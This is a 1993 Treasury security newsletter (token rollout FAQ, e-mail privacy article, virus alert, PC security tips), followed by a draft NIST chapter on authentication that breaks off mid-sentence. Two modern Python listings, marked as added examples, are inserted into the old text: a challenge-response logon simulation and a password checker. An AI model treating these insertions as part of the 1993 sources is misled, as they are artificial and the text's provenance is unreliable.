The Information Systems Security Monitor Volume 3 Number 3

+------------------------------------------------------------------+
|              Information Systems Security Monitor                |
+------------------------------------------------------------------+

Dedicated to the pursuit of security awareness..............

===========================================================================
Volume 3 Number 3                                                July 1993
===========================================================================

IN THIS ISSUE

WHO'S READING YOUR SCREEN

What's New?

Questions on Security Tokens

Clyde's Computer Security Hall of Fame

Virus Alert

Dear Clyde

Token Demo

Jim's Corner

Computer Speak

Computer Security Slogan Awardees (Insert)

The ISSM is a quarterly publication of the Department of Treasury, Bureau of the
Public Debt, AIS Security Branch, 200 3rd Street, Parkersburg, WV 26101  (304)
480-6355

Editors:   Ed Alesius
              Kim Clancy
              Mary Clark
              Jim Heikkinen
              Joe Kordella

*******************************
*                             *
*  WHO'S READING YOUR SCREEN  *
*    by Philip Elmer-Dewitt   *
*                             *
*******************************

It's a situation that arises a million times a day in offices around the world. 
An employee has something personal to tell a co-worker---a confidence, a joke, a
bit of gossip that might give offense if it were overheard.  Rather than pick up
the phone or wander down the hall, he or she simply types a message on a desktop
computer terminal and sends it as electronic mail.  The assumption is that
anything sent by E-mail is as private---if not more so---than a phone call or a
face-to-face meeting.

That assumption, unfortunately, is wrong. Although it is illegal in some states
for an employer to eavesdrop on private conversations or telephone calls---even
if they take place on a company-owned phone---there are no clear rules governing
electronic mail.  In fact, the question of how private E-mail should be has
emerged as one of the stickiest legal issues of the electronic age, one that seems
to evoke very different responses depending on whose electronic mail system is
being used and who is reading the E-mail.

Does the White House, for example, have the right to destroy electronic messages
created in the course of running the government?  That issue came to a head last
week when a federal judge barred the Bush Administration from erasing computer
tapes containing E-mail dating back to the Reagan era---including electronic memos
that are relevant to Iran-contra and might implicate officials in the Iraqgate and
Clinton passport scandals.

The White House had issued guidelines that would have allowed staff members to
delete that mountain of electronic evidence.  Judge Charles Richey dismissed those
instructions as "capricious" and "contrary to the law."  He specifically rejected
the argument that all substantive E-mail had been saved in computer printouts. 
The paper versions, Richey noted, omit who received the documents and when.  "What
government officials knew and when they knew it has been a key question in not
only the Iran-contra investigation but also in the Watergate matter."

Many historians and legal experts applauded the decision.  Government officials,
they argue, are civil servants conducting the public's business; the public has
the right to review any documents they create--paper or electronic.  But how would
those citizens feel if it were their E-mail that was being preserved for
posterity?  Shouldn't private missives sent over a privately owned computer be
sacrosanct?

That's what Rhonda Hall and Bonita Bourke thought.  Three years ago, they were
hired by a California subsidiary of Nissan to set up and run the electronic mail
network that links the car company's Infiniti dealers.  A female supervisor heard
that some of their E-mail was getting pretty steamy and began monitoring the
messages.  She soon discovered that the two had some disparaging things to say
about her, and the women were threatened with dismissal.  When Hall and Bourke
filed a grievance complaining that their privacy had been violated, they were
fired.

One might think the two employees had a strong case for unlawful termination.  But
their case was dismissed.  Nissan's lawyers argued successfully that since the
company owned the computer system, its supervisors had a perfect right to read
anything created on it.  "I'm dismayed," says Noel Shipman, the attorney who is
handling Hall and Bourke's appeal.  "To me, the simple bottom line is that
gentlemen don't read each other's mail."

But it's not that simple.  The Electronic Communications Privacy Act of 1986
prohibits "outside" interception of E-mail by a third party--the government, the
police or an individual--without proper authorization (such as a search warrant).
It does not, however, cover "inside" interception---seeking a peek at the office
gossip's E-mail, for example.  In the past, courts have ruled that interoffice
communications were considered private only if employees had a "reasonable
expectation" of privacy when they sent it. 

The fact is no absolute privacy exists in a computer system, even for the boss. 
System administrators need to have access to everything in a computer in order to
maintain it.  Moreover, every piece of E-mail leaves an electronic trail.  Though
Oliver North tried to delete all his electronic notes in order to conceal the
Iran-contra deal, copies of his secret memos ended up in the backup tapes made
every night by the White House system operators.  "The phrase 'reasonable
expectation of privacy' is a joke, because nobody reasonably expects any privacy
nowadays," says Michael Godwin, general counsel for the Electronic Frontier
Foundation, a not-for-profit group devoted to protecting the civil liberties of
people using electronic networks. 

Some computer users are taking matters into their own hands.  If the law will not
protect the privacy of their E-mail, they'll do it themselves--by scrambling their
messages with encryption codes.  Godwin's group is advocating that the government
let private individuals use the most powerful encryption systems--systems that
even the FBI can't crack. Unfortunately, such complex codes are likely to
undermine the principal virtue of electronic mail: convenience.  In the end,
people bent on private communication--or government officials involved in criminal
conspiracies--had best pick up the phone, or better yet, stroll down the hall and
have a good old-fashioned face-to-face conversation. 

Copyright 1993 TIME, Inc. 
Reprinted by permission.

            **********************END OF ARTICLE*********************

+++++++++++++++++++++++
+                     +
+    WHAT'S NEW?      + 
+                     +
+++++++++++++++++++++++

The AIS Security Branch's Electronic BBS number has changed.  Bureau telephone
changes at the Parkersburg location have been completed and the 420 prefix has
been replaced with a 480.  The new BBS number is (304) 480-6083. 

A new feature starts with this issue of the ISSM, titled "Jim's Corner".  This
article, written by Jim Heikkinen, will list Security Branch Training offerings;
various computer security Videos; CBTs; and publications available to Bureau
personnel through the AIS Security Branch.

                  ****************END OF ARTICLE***************

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%                                   %
%    QUESTIONS ON SECURITY TOKENS   % 
%         By Kim Reese              %
%                                   %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

In the last issue of the ISSM, an article was published describing security tokens
and Public Debt's plans to implement this technology in 1994.  As a result,
several questions about the tokens were received.  We felt that others may have
had the same questions and decided to publish them with their responses. 

     1)   What do the Tokens look like?
          The Tokens resemble a small pocket calculator.
     2)   How big are the Tokens?
          Each Token is approximately 2 1/2" x 3 3/4" in its case.  The actual
          Token itself is the size of two credit cards stacked together.
     3)   Will I have to have the Token with me at all times, i.e., carry it with
          my BPD I.D.?
          No, you can secure your Token in your desk unless you are required to
          have dial-in access from home in order to perform your job function.
     4)   How many steps is this adding to my Logon?
          Approximately three steps plus Logon I.D. and mainframe password. The
          Security branch is looking at purchasing software that would allow you
          to log directly into the mainframe at the fifth step. 
     5)   Do I take the Token home with me?
          No, unless you require dial-in access from home.
     6)   What happens if I lose the Token?
          If your Token is lost notify your ISSM.  The ISSM will provide you with
          another Token and notify the other ISSMs and OAIS Security branch to be
          aware of the missing Token.
     7)   What happens if the Token breaks?
          If your Token breaks notify your ISSM. The ISSM will replace your Token
          with a new one and return the faulty Token to the OAIS Security branch
          to be returned to the contractor for repair or replacement.
     8)   What if I forget my PIN number?
          Contact your ISSM.  If you have not changed your PIN number the ISSM is
          able to determine the PIN number of your Token through the OAIS Security
          branch.  If you have changed your PIN number the ISSM will replace
          your Token and provide the PIN number assigned to the new Token.
     9)   If I lose my Token and someone else finds it, can they use my Token?
          No, the other person would need to know your PIN number in order to
          activate your Token.
     10)  Could someone borrow my Token to gain access if they cannot find their
          Token?
          No, the other person would need access to both your PIN number and your
          Logon I.D./Password.
     11)  Do the Tokens need to be LOCKED UP when we are not using them?
          Yes, the Tokens should be kept in a secured area. (i.e. locked in your
          desk)
     12)  Is the LOGON complicated using the Tokens?
          No, you will be provided short, concise step-by-step instructions on the
          process and one-on-one training.
     13)  Who do I contact if the Token is not functioning properly?
          You contact the Command Center, just as you do for other mainframe
          questions.
     14)  You mean I have to learn a new PIN number every time the battery goes
          dead on the Token?
          Yes, the contractor will probably do all maintenance of the Tokens
          including changing batteries.  We are not equipped or trained to
          properly maintain the Tokens, therefore this was included in the
          procurement contract.
     15)  Do the Tokens need to avoid severe temperature changes?
          Yes, this should not be a problem if the Token is left in your desk.
     16)  What kind of training will be provided on the Token use?
          Token training will be done on a one-on-one basis with each user by
          their ISSM until the user is comfortable with the Logon process.
     17)  When is the implementation date for the Tokens?
          Implementation for the Tokens is tentatively scheduled for March 1994.
     18)  To whom do I report a missing Token?
          Report missing Tokens to your ISSM who will notify OAIS Security branch
          of the missing Token.
     19)  Will we be financially responsible for a lost or broken Token?
          No, the procurement contract covers maintenance issues.

Please forward any additional questions to the OAIS Security Branch or a member
of the Token Committee.  The committee members are Kim Clancy, Dana Whited, Mary
Clark, Glenn Siber, Kim Reese and Sandra Woods.

                 ****************END OF ARTICLE*****************

XXXXXXXXXXXXXXXXXXXXXXXXXXX
X                         X
X         CLYDE'S         X
X    Computer Security    X
X      Hall of Fame       X
X                         X
XXXXXXXXXXXXXXXXXXXXXXXXXXX

Patrick Conner, ISSM for the Office of Administration, Division of Management
Services has been inducted to the Computer Security Hall of Fame.

Patrick Conner's dedication to his ISSM responsibilities is impressive.  Upon
Pat's assignment as an ISSM, his commitment to ensuring the success of the
Division of Management Services security program was evident.  Pat accepted his
new responsibilities with enthusiasm and was obviously concerned about "doing the
job right."  Pat has assisted in blazing new ground for the security program when
he educated application development teams in his area of their responsibilities
in regards to security.  Pat contacted the AIS Security Branch and requested a
meeting so that all members of the development team could be made aware of their
security responsibilities during development of the project.  This is an
impressive accomplishment for both Pat and Public Debt.  It ensures that
applications are installed with security in mind and aids Public Debt in enhancing
the integrity of its computing program. Pat's dedication to ensuring that the job
is done right the first time is a valuable one.  Thanks Pat for a job well done.

Submitted by Kim Clancy, Manager of the AIS Security Branch

                 ****************END OF ARTICLE*****************

{{{{{{{{{{{{{{{{{{{{{{{{{{
{                        {
{    VIRUS ALERT         {
{                        {
{{{{{{{{{{{{{{{{{{{{{{{{{{

The following information was received from the Office of Information Resources
Management...

This is to advise you that the Mint has encountered virus problems with PCs rented
by Price-Waterhouse Corporation for work being conducted at the bureau.  The Mint
ADP staff identified computer viruses in the equipment Price-Waterhouse brought
to the Mint.  To date, the Mint has found two viruses which have affected five of
the Price-Waterhouse PCs and 60% of their disks.  By taking immediate action, the
Mint was able to eradicate the viruses, save the Price-Waterhouse data, and
prevent the viruses from spreading to the Mint's own nationwide computer network.

Of particular concern to the Mint is the discovery that Price-Waterhouse
apparently has known that it has had virus problems in its own offices for
approximately 9 months.  Since Price-Waterhouse may be working with bureaus other
than the Mint, we are alerting you to this situation, and suggest that action be
taken as appropriate within your bureau to ensure that your systems are not
infected.

                 ****************END OF ARTICLE*****************

++++++++++++++++++++++++++
+     DEAR CLYDE         +
+                        + 
++++++++++++++++++++++++++

Responses to questions for those who are searching for the truth.

Dear Clyde,

I have information on my PC I want to protect.  Do you have any suggestions about
PC security techniques?
                              R. Concerned

Dear Concerned,

The easiest way to secure data on your PC is to install programs which will
require a password to gain access to your data.  For most PCs, a boot-up password
can be installed by running the set-up program for your PC.  Also, files can be
password protected within such applications as WordPerfect, Dbase and Lotus.  If
your PC does not have a password protection feature, there are programs such as
PW62.ZIP, SECURE.EXE, ENCRYPT.EXE, DECRYPT.EXE, and PASSWORD.EXE available from
the AIS Security Bulletin Board.

Another measure of security is to guard against destructive virus files being
loaded onto your PC.  There are virus detection programs available such as Central
Point, Commcrypt, F-Prot, and Vader to aid you in detection of such virus codes.

Always remember, when leaving your area, to activate software that requires a
password to be entered before your PC can be used; that way your data remains
secured.

If you need help installing any of these programs, your ISSM can help you.

Send your comments or questions to Clyde c/o the AIS Security Branch in
Parkersburg, Room 107F, or leave them in Clyde's mailbox located on the Security
bulletin boards throughout the Parkersburg office.

                 ****************END OF ARTICLE*****************
============================
=                          =
=         TOKEN DEMO       =
=        by Mary Clark     = 
=                          =
============================

A Security presentation was delivered by Kim Clancy, AIS Security Branch Manager,
to the Executive Board (E-Board) introducing the Computer Security Issues and
options facing Public Debt.  As a result, it was determined that Public Debt's
mainframe would be protected by the use of randomly generated passwords using a
DES-compliant token device.  Such passwords change at each logon attempt and are
therefore considerably more secure than the "static passwords" that we now use.

Beginning in March, 1994, all Bureau of Public Debt mainframe users will be
required to use a token-generated password device.  

A token implementation team was organized, and an implementation plan was
developed that included the steps involved in the implementation of token controls
on the mainframe.  One of the tasks identified by the team to be completed before
implementation was user awareness of the tokens.

As part of the awareness plan, a token demonstration was set up at E-Street (Room
527), C-Street (Room 223), and Parkersburg (In the front hall under Security
branch's bulletin board, main building).  This simple demonstration is an
imitation of how the tokens will be utilized to improve the security of our
mainframe computer system.  It requires approximately five steps to gain access
to the mainframe.  These steps include: 

     1.   Entering a user name.
     2.   Entering a fixed password.
     3.   Entering a PIN number to activate the token.
     4.   Entering a password from the PC into the token.
     5.   Entering the token generated password into the PC to gain access.

Although the logon procedure will vary slightly with the mainframe software, this
demonstration gives a general idea of the steps involved with the token
technology.  Included with the demonstration is a handout listing questions and
answers on Security Tokens.  The handout answers the most frequently asked
questions about the security tokens. 
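The five-step exchange above, simulated end to end as an added example (not Public Debt's procedure or the token vendor's code): the mainframe side checks the user name and fixed password, issues the value the PC displays, and verifies the token's one-time response; the token side unlocks on the PIN and computes the response. It assumes HMAC-SHA256 in place of the DES function the real token uses, 8-digit responses, and constructed user names, passwords, PIN and keys; it also exercises the cases raised in the Questions on Security Tokens article (a found token without the PIN, a borrowed token without the logon ID/password) and a replayed response.

```python
"""Five-step token logon, simulated (added example, not the real system).
Assumptions: HMAC-SHA256 stands in for the token's DES function (no DES in the
standard library); responses are 8 digits; each issued challenge is valid once."""
import hashlib
import hmac
import os
import secrets
from typing import Dict, Optional, Tuple

RESPONSE_DIGITS = 8  # assumed length of the token-generated password


def _keyed_digits(key: bytes, challenge: str) -> str:
    """One-time password: keyed function of the challenge, reduced to digits."""
    mac = hmac.new(key, challenge.encode(), hashlib.sha256).digest()
    value = int.from_bytes(mac[:8], "big") % 10 ** RESPONSE_DIGITS
    return str(value).zfill(RESPONSE_DIGITS)


def _pw_hash(salt: bytes, password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class Token:
    """Hand-held token: secret key shared with the mainframe, unlocked by a PIN."""

    def __init__(self, secret_key: bytes, pin: str) -> None:
        self._key, self._pin, self._unlocked = secret_key, pin, False

    def activate(self, pin: str) -> bool:
        # Step 3: the PIN activates the token; a wrong PIN leaves it locked,
        # which is why a lost token is useless to whoever finds it.
        self._unlocked = hmac.compare_digest(pin.encode(), self._pin.encode())
        return self._unlocked

    def respond(self, challenge: str) -> str:
        # Step 4: the value shown by the PC is keyed into the token.
        if not self._unlocked:
            raise PermissionError("token not activated")
        return _keyed_digits(self._key, challenge)


class Mainframe:
    """Host side: user records, challenge issue and response verification."""

    def __init__(self) -> None:
        self._users: Dict[str, Tuple[bytes, bytes, bytes]] = {}  # salt, hash, key
        self._pending: Dict[str, str] = {}  # outstanding challenge per user

    def enroll(self, user: str, fixed_password: str, token_key: bytes) -> None:
        salt = os.urandom(16)
        self._users[user] = (salt, _pw_hash(salt, fixed_password), token_key)

    def begin_logon(self, user: str, fixed_password: str) -> Optional[str]:
        # Steps 1 and 2: user name and fixed password.  On success the PC shows
        # a fresh random challenge for the user to key into the token.
        rec = self._users.get(user)
        if rec is None:
            return None
        salt, pw_hash, _ = rec
        if not hmac.compare_digest(_pw_hash(salt, fixed_password), pw_hash):
            return None
        challenge = str(secrets.randbelow(10 ** RESPONSE_DIGITS)).zfill(RESPONSE_DIGITS)
        self._pending[user] = challenge
        return challenge

    def finish_logon(self, user: str, response: str) -> bool:
        # Step 5: the token-generated password is typed into the PC.  The
        # challenge is consumed here, so the same response cannot be replayed.
        challenge = self._pending.pop(user, None)
        if challenge is None:
            return False
        expected = _keyed_digits(self._users[user][2], challenge)
        return hmac.compare_digest(expected.encode(), response.encode())


def logon(host: Mainframe, token: Token, user: str, password: str, pin: str) -> bool:
    """Run all five steps as the user would at the PC."""
    challenge = host.begin_logon(user, password)
    if challenge is None or not token.activate(pin):
        return False
    return host.finish_logon(user, token.respond(challenge))


def run_demo() -> Dict[str, bool]:
    """Constructed scenario: one enrolled user plus the failure cases from the FAQ."""
    host, key = Mainframe(), os.urandom(32)   # constructed token secret
    token = Token(key, pin="2468")            # constructed PIN
    host.enroll("user01", "static-pw", key)
    results = {"normal": logon(host, token, "user01", "static-pw", "2468")}
    # Q9: the token is found by someone who does not know the PIN.
    results["found_token_wrong_pin"] = logon(host, token, "user01", "static-pw", "0000")
    # Q10: the token and PIN are borrowed, but not the logon ID/password.
    results["borrowed_token_wrong_password"] = logon(host, token, "user01", "guess", "2468")
    # Replay: a response captured from an earlier logon is submitted again.
    token.activate("2468")
    first = token.respond(host.begin_logon("user01", "static-pw"))
    host.finish_logon("user01", first)
    host.begin_logon("user01", "static-pw")  # a new logon issues a new challenge
    results["replayed_response"] = host.finish_logon("user01", first)
    return results
```

Only the first scenario in run_demo() is granted access; the other three are refused for the reasons the FAQ gives, and the replayed response fails because the mainframe has already consumed the challenge it answered.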

Any questions or comments regarding the demonstration should be directed to your
ISSM or one of the token team members.  The token team consists of:  Kim Clancy,
Mary Clark, Kim Reese, Glenn Siber, Dana Whited, and Sandy Woods.

                 ****************END OF ARTICLE*****************

!!!!!!!!!!!!!!!!!!!!!!!!!!!
!                         !
!      JIM'S CORNER       !
!    by Jim Heikkinen     !
!                         !
!!!!!!!!!!!!!!!!!!!!!!!!!!!

Starting with this issue I will offer training opportunities for anyone who
desires a security "tune-up". 

Initially, however, some background information is required to provide insight
into the Security Branch security awareness training mission.

The AIS Security Branch is mandated by the Computer Security Act of 1987, Public
Law 100-235, to provide "...mandatory periodic training in computer security
awareness and accepted computer practices of all employees who are involved with
the management, use, or operation of each federal computer system within or under
the supervision of..." the Bureau of Public Debt.

Further, the branch follows the guidelines and standards developed by the National
Institute of Standards and Technology (NIST) in providing this required training.
NIST Special Publication 500-172 may be considered the training "bible" in that
all employee categories, subject matter areas and training levels are provided for
in a matrix of training activities that satisfies the exigencies of P.L. 100-235. 
I'll expand each category and explain how each applies to our individual security
responsibilities in future issues of the newsletter. 

Also, samples of opportunities for refresher training and interesting audio-visual
materials will be offered.

Formal training to be announced:

     ACF2 - Washington (contract award is imminent)
     SNA/APPN/APPC - IBM Network Architectures
     Novell NetWare Security - Novell specific security issues

Publication:   (Available on request basis through the Parkersburg AIS Security
Branch.)

     "Computer Addiction?  A study of computer dependency" by Margaret A. Shotton 

               *******************END OF ARTICLE******************

################################################
#                                              #
#              COMPUTER SPEAK                  #
#    COMPUTER TERMS AND THEIR MEANINGS         #
#                                              #
################################################

DES (Data Encryption Standard) ... an encryption method approved as a standard by
the U.S. National Institute of Standards and Technology (NIST) and the American
National Standards Institute (ANSI) for encoding nonclassified sensitive digital
information.

eavesdrop ... Unauthorized interception of information.  Usually refers to
passive interception (receiving information), rather than active interception
(changing information).

encryption ... the transformation of original text (called plaintext) into
unintelligible text (called ciphertext).  Sometimes called "enciphering."

               ******************END OF ARTICLE******************

The AIS Security Branch runs an Electronic BBS. Give us a call at (304) 480-6083.
An electronic version of the ISSM is posted on the board and can be downloaded.
Articles in the electronic version may include more detail in that we are not
limited by space constraints as we are in the paper copy. 

               ******************END OF ARTICLE******************


Downloaded From P-80 International Information Systems 304-744-2253

Draft of the NIST Computer Security Handbook on Identification and Authentication

* * * * * * * * * * * * *  NOTE * * * * * * * * * * * * * * * * *

This file is a DRAFT chapter intended to be part of the NIST
Computer Security Handbook.  The chapters were prepared by
different parties and, in some cases, have not been reviewed by
NIST.  The next iteration of a chapter could be SUBSTANTIALLY
different than the current version.  If you wish to provide
comments on the chapters, please email them to roback@ecf.ncsl.gov
or mail them to Ed Roback/Room B154, Bldg 225/NIST/Gaithersburg, MD 
20899.  

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

DRAFT          DRAFT          DRAFT          DRAFT          DRAFT

                IDENTIFICATION AND AUTHENTICATION

1    Introduction

     Information technology (IT) systems and the data they store
and process are valuable resources which need to be protected. 
One of the first steps toward securing an IT system is the
ability to verify the identity of its users.  The process of
verifying a user's identity is typically referred to as user
identification and authentication.  Passwords are the method used
most often for authenticating computer users, but this approach
has often proven inadequate in preventing unauthorized access to
computer resources when used as the sole means of authentication. 

     New technology is emerging that can significantly improve
the protection afforded by password-only authentication.  This
chapter will discuss the elements involved in authenticating
users as well as technological advances that can be used with or
instead of passwords to help ensure that only authorized users
can access an organization's IT resources.  

2    Overview

     Determining if a user is authorized to use an IT system
includes the distinct steps of identification and authentication. 
Identification concerns the manner in which a user provides his
unique identity to the IT system.  The identity may be a name
(e.g., first or last) or a number (e.g., account number).  The
identity must be unique so that the system can distinguish among
different users.  Depending on operational requirements, one
"identity" may actually describe one individual, more than one
individual, or one (or more) individuals only part of the time.  

     For example, an identity could be "system security officer,"
which could denote any of several individuals, but only when
those individuals are performing security officer duties and not
using the system as an ordinary user.  The identity should also
be non-forgeable so that one person cannot impersonate another. 
Additional characteristics, such as the role a user is assuming
(for example, the role of database administrator), may also be
specified along with an identity. 

     Authentication is the process of associating an individual
with his unique identity, that is, the manner in which the
individual establishes the validity of his claimed identity. 
There are three basic authentication means by which an individual
may authenticate his identity.       

          a.   Something an individual KNOWS (e.g., a password,
               Personal ID Number (PIN), the combination to a lock, a
               set of facts from a person's background).

          b.   Something an individual POSSESSES (e.g., a token or
               card, a physical key to a lock).

          c.   Something an individual IS (e.g., personal
               characteristics or "biometrics" such as a fingerprint
               or voice pattern).

      These basic methods may be employed individually, but many
user login systems employ various combinations of the basic
authentication methods.  An important distinction between
identification and authentication is that identities are public
whereas authentication information is kept secret and thus
becomes the means by which an individual proves that he actually
is who he claims to be.  In addition, identification and
authentication provide the basis for future access control.

3    Technical Approaches

     The use of passwords for authentication is widespread, and a
certain amount of expense and time is required to upgrade to more
sophisticated techniques.  In the near-term, one approach to
increasing the security of IT systems is to improve the use and
management of passwords, while exploring the use of alternate
technologies over time. 

3.1  Passwords

3.1.1 Security Considerations

     The security of a password scheme is dependent upon the
ability to keep passwords secret.  Therefore, a discussion of
increasing password security should begin with the task of
choosing a password.  A password should be chosen such that it is
easy to remember, yet difficult to guess.  There are a few
approaches to guessing passwords which we will discuss, along
with methods of countering these attacks.

     Most operating systems, as well as large applications such
as Database Management Systems, are shipped with administrative
accounts that have preset passwords.  Because these passwords are
standard, outside attackers have used them to break into IT
systems.  It is a simple, but important, measure to change the
passwords on administrative accounts as soon as an IT system is
received.

     A second approach to discovering passwords is to guess them,
based on information about the individual who created the
password.  Using such information as the name of the individual,
spouse, pet or street address or other information such as a
birth date or birthplace can frequently yield an individual's
password.  Users should be cautioned against using information
that is easily associated with them for a password.

     There are several brute force attacks on passwords that
involve either the use of an on-line dictionary or an exhaustive
attempt at different character combinations.  There are several
tactics that may be used to prevent a dictionary attack.  They
include deliberately misspelling words, combining two or more
words together, or including numbers and punctuation in a
password.  Ensuring that passwords meet a minimum length
requirement also helps make them less susceptible to brute force
attacks.

     To assist users in choosing passwords that are unlikely to
be guessed, some operating systems provide randomly generated
passwords.  While these passwords are often described as
pronounceable, they are frequently difficult to remember,
especially if a user has more than one of them, and so are prone
to being written down.  In general, it is better for users to
choose their own passwords, but with the considerations outlined
above in mind.  
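As an added example (not from the draft), a screen that applies the guessing attacks this subsection names to a candidate password: vendor default passwords, information easily associated with the user, and dictionary words, together with the minimum-length rule. The dictionary, the default list, the user profile and the 8-character minimum are constructed placeholders; it goes one step beyond the text in treating a single dictionary word decorated with digits or punctuation as still guessable.

```python
"""Password-choice screen for the guessing attacks listed in 3.1.1 (added
example, not from the draft).  Dictionary, default list, profile and the
8-character minimum are constructed stand-ins for an organization's own."""
import re
from typing import Dict, List, Set

MIN_LENGTH = 8  # assumed policy value; the draft only says "a minimum length"
# Constructed stand-ins for an on-line dictionary and a vendor default list.
DICTIONARY: Set[str] = {"password", "secret", "welcome", "dragon", "monkey", "letmein"}
VENDOR_DEFAULTS: Set[str] = {"manager", "system", "changeme", "sysadm"}


def personal_fragments(profile: Dict[str, str]) -> List[str]:
    """Strings an attacker could guess from what is known about the user:
    names, street, birthplace and birth-date pieces (the second attack in 3.1.1)."""
    frags: List[str] = []
    for key in ("name", "spouse", "pet", "street", "birthplace"):
        frags += [w.lower() for w in re.findall(r"[A-Za-z]{3,}", profile.get(key, ""))]
    birth = profile.get("birthdate", "")  # assumed form YYYY-MM-DD
    if birth:
        year, month, day = birth.split("-")
        frags += [year, month + day, day + month]
    return frags


def check_password(candidate: str, profile: Dict[str, str]) -> List[str]:
    """Return every reason the candidate is weak; an empty list means it passes."""
    reasons: List[str] = []
    lowered = candidate.lower()
    letters_only = re.sub(r"[^a-z]", "", lowered)
    if len(candidate) < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if lowered in VENDOR_DEFAULTS:
        reasons.append("vendor default password")
    if lowered in DICTIONARY:
        reasons.append("single dictionary word")
    elif letters_only in DICTIONARY:
        # One word dressed up with digits or punctuation is still one dictionary
        # entry to try; the draft's advice is to combine or misspell words.
        reasons.append("dictionary word with digits/punctuation added")
    for frag in personal_fragments(profile):
        if frag in lowered:
            reasons.append(f"contains personal information ({frag})")
            break
    return reasons


if __name__ == "__main__":
    # Constructed user profile used for the checks.
    who = {"name": "Jane Sample", "spouse": "Robin", "pet": "Fido",
           "street": "44 Elm Avenue", "birthdate": "1970-06-21"}
    for pw in ("secret", "welcome1!", "Fido-1970x", "changeme", "Blu3 Kangaroo!"):
        print(f"{pw!r:18} {check_password(pw, who) or 'ok'}")
```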

3.1.2  Management Issues

      Password length and the frequency with which passwords are
changed in an organization should be defined by the
organization's security policy and procedures and implemented by
the organization's IT system administrator(s).  The frequency
with which passwords should be changed should depend on the
sensitivity of the data.  Periodic changing of passwords can
prevent the damage done by stolen passwords, and make "brute
force" attempts to break into a system more difficult.  Too
frequent changes, however, can be irritating to users and can
lead to security breaches such as users writing down passwords or
using too-obvious passwords in an attempt to keep track of a
large number of changing passwords.  This is inevitable when
users have access to a large number of machines.  Security policy
and procedures should strive for consistent, livable rules across
an organization.

     Some mainframe operating systems and many PC applications
use passwords as a means of access control, not just
authentication.  Instead of using mechanisms such as access
control lists (ACLs), access is granted by entering a password. 
The result is a proliferation of passwords that can significantly
reduce the overall security of an IT system.  While the use of
passwords as a means of access control is common, it is an
approach that is less than optimal and not cost-effective.

3.2  Memory Card

      There is a very wide variety of memory card systems with
applications for user identification and authentication.  Such
systems authenticate a user's identity based on a unique card,
i.e., something the user possesses, sometimes in conjunction with
a PIN (Personal Identification Number), i.e., something a user
knows.  The use of a physical object or token, in this case a
card, has prompted memory card systems to be referred to as token
systems.  Other examples of token systems are optical storage
cards and integrated circuit (IC) keys.

     Memory cards store, but do not process, information. 
Special reader/writer devices control the writing and reading of
data to and from the cards.  The most common type of memory card
is a magnetic stripe card.  These cards use a film of magnetic
material, similar or identical to that used in audio and computer
magnetic tape and disk equipment, in which a thin strip, or stripe,
of magnetic material is affixed to the surface of a card.  A magnetic
stripe card is inexpensive, easy to produce and has a high
storage capacity. 

     The most common forms of a memory card are the telephone
calling card, credit card, and ATM card.  The number on a
telephone calling card serves as both identification and
authentication for the user of a long distance carrier and so
must remain secret.  The card can be used directly in phones that
read cards or the number may be entered manually in a touch tone
phone or verbally to an operator.  Possession of the card or
knowledge of the number is sufficient to authenticate the user.

     Possession of a credit card, specifically the card holder's
name, card number and expiration date, is sufficient for both
identification and authentication for purchases made over the
telephone.  The inclusion of a signature and occasionally a
photograph provide additional security when the card is used for
purchases made in person.

     The ATM card employs a more sophisticated use of a memory
card, involving not only something the user possesses, namely the
card, but also something the user knows, viz. the PIN.  A lost or
stolen card is not sufficient to gain access; the PIN is required
as well.  This paradigm of use seems best suited to IT
authentication applications.

     While there are some sophisticated technical attacks that
can be made against memory cards, they can provide a marked
increase in security over password-only systems.  It is important
that users be cautioned against writing their PIN on the card
itself or there will be no increase in security over a simple
password system.  

       Memory cards can be and are widely used to perform
authentication of users in a variety of circumstances from
banking to physical access.  It is important that the
considerations mentioned above for password selection are
followed for PIN selection and that the PIN is never carried with
the card to gain the most from this hybrid authentication system.

3.3  Smart Card

      A smart card is a device typically the size and shape of a
credit card and contains one or more integrated chips that
perform the functions of a computer with a microprocessor,
memory, and input/output.  Smart cards may be used to provide
increased functionality as well as an increased level of security
over memory cards when used for identification and
authentication.

      A smart card can process, as well as store, data through
its microprocessor; therefore, the smart card itself (as opposed
to the reader/writer device), can control access to the
information stored on the card.  This can be especially useful
for applications such as user authentication in which security of
the information must be maintained.  The smart card can actually
perform the password or PIN comparisons inside the card.  

      As an authentication method, the smart card is something
the user possesses.  With recent advances, a password or PIN
(something a user knows) can be added for additional security and
a fingerprint or photo (something the user is) for even further
security.  As contrasted with memory cards, an important and
useful feature of a smart card is that it can be manufactured to
ensure the security of its own memory, thus reducing the risk of
lost or stolen cards.  

     The smart card can replace conventional password security
with something better, a PIN, which is verified by the card
versus the computer system, which may not have as sophisticated a
means for user identification and authentication.  The card can
be programmed to limit the number of login attempts as well as
ask biographic questions, or make a biometric check to ensure
that only the smart card's owner can use it.  In addition, non-
repeating challenges can be used to foil a scenario in which an
attacker tries to log in using a password or PIN he observed from
a previous login.  Finally, the complexities of smart card
manufacturing make forgery of the card's contents virtually
impossible.  

     Use of smart devices means the added expense of the card
itself, as well as the special reader devices.  Careful decisions
as to what systems warrant the use of a smart card must be made. 
The cost of manufacturing smart cards is higher than that of
memory cards but the disparity will get less and less as more and
more manufacturers switch to this technology.  On the other hand,
it should be remembered that smart cards, as opposed to memory
only cards, can effectively communicate with relatively 'dumb',
inexpensive reader devices.  

     The proper management and administration of smart cards will
be a more difficult task than with typical password
administration.  It is extremely important that responsibilities
and procedures for smart card administration be carefully
implemented.  Smart card issuance can be easily achieved in a
distributed fashion, which is well suited to a large
organizational environment.  However, just as with password
systems, care should be taken to implement consistent procedures
across all involved systems.

3.4  Hand-Held Password Generators

     Hand-held password generators are a state-of-the-art type
of smart token.  They provide a hybrid authentication, using both
something a user possesses (i.e., the device itself) and
something a user knows (e.g., a 4- to 8-digit PIN).  The device is
the size of a shirt-pocket calculator, and does not require a
special reader/writer device.  One of the main forms of password
generators is a challenge-response calculator.

     When using a challenge-response calculator, a user first
types his user name into the IT system.  The system then presents
a random challenge, for example, in the form of a 7-digit number. 
The user is required to type his PIN into the calculator and then
enter the challenge generated by the IT system into the
calculator.  The generator then provides a corresponding
response, which he then types into the IT system.  If the
response is valid, the login is permitted and the user is granted
access to the system.

     When a password generator is used for access to a computer
